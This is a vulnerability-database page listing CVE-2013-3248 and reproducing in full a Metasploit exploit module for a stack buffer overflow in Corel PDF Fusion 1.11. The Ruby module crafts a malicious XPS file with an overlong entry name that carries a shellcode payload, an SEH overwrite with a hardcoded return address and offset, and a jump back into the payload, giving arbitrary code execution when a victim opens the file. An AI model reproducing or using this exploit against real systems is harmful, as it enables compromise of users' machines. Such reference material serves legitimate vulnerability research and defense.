Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Corel PDF Fusion - Local Stack Buffer Overflow (Metasploit)

🗓️ 13 Jul 2013 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 28 Views

Corel PDF Fusion buffer overflow vulnerability in handling XPS file with long entry names allows execution of arbitrary code.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Corel PDF Fusion Stack Buffer Overflow Vulnerability
12 Jul 201300:00
zdt
Circl		CVE-2013-3248
13 Jul 201300:00
circl
Check Point Advisories		Corel PDF Fusion XPS Stack Buffer Overflow (CVE-2013-3248)
4 Nov 201300:00
checkpoint_advisories
CVE		CVE-2013-3248
3 Oct 201323:00
cve
Cvelist		CVE-2013-3248
3 Oct 201323:00
cvelist
Metasploit		Corel PDF Fusion Stack Buffer Overflow
11 Jul 201317:30
metasploit
NVD		CVE-2013-3248
3 Oct 201323:55
nvd
OpenVAS		Corel PDF Fusion 1.11 Multiple Vulnerabilities - Windows
15 Oct 201300:00
openvas
Packet Storm		Corel PDF Fusion Stack Buffer Overflow
12 Jul 201300:00
packetstorm
Prion		Design/Logic Flaw
3 Oct 201323:55
prion
Rows per page
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex/zip'


class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Corel PDF Fusion Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability in version 1.11 of
        Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry
        names. In order for the payload to be executed, an attacker must convince the target
        user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the
        attacker can execute arbitrary code as the target user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Kaveh Ghaemmaghami', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3248' ],
          [ 'OSVDB', '94933' ],
          [ 'BID', '61010' ],
          [ 'URL', 'http://secunia.com/advisories/52707/' ]
        ],
      'Platform'       => [ 'win' ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space' => 4000
        },
      'Targets'        =>
        [
          # Corel PDF Fusion 1.11 (build 2012/04/25:21:00:00)
          # CorelFusion.exe 2.6.2.0
          # ret from unicode.nls # call dword ptr ss:[ebp+0x30] # tested over Windows XP SP3 updates
          [ 'Corel PDF Fusion 1.11 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 4640 } ]
        ],
      'DisclosureDate' => 'Jul 08 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.xps'])
      ], self.class)

  end


  def exploit
    template = [
      "[Content_Types].xml",
      "_rels/.rels",
      "docProps/thumbnail.jpeg",
      "docProps/core.xml",
      "FixedDocSeq.fdseq",
      "Documents/1/Pages/_rels/1.fpage.rels",
      "Documents/1/_rels/FixedDoc.fdoc.rels",
      "Documents/1/FixedDoc.fdoc",
      "Documents/1/Structure/Fragments/1.frag",
      "Documents/1/Structure/DocStructure.struct",
      "Documents/1/Pages/1.fpage",
    ]

    xps = Rex::Zip::Archive.new
    template.each do |k|
      xps.add_file(k, rand_text_alpha(10 + rand(20)))
    end

    resources_length = "Resources/".length
    sploit = "Resources/"
    sploit << payload.encoded
    sploit << rand_text(target['Offset'] - sploit.length)
    sploit << generate_seh_record(target.ret)
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8 - resources_length}").encode_string # 8 => seh_record length
    sploit << rand_text(1500) # Trigger exception

    xps.add_file(sploit, rand_text_alpha(10 + rand(20)))

    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(xps.pack)
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Jul 2013 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.59529
corel pdf fusionbuffer overflowxps filearbitrary codevulnerability
28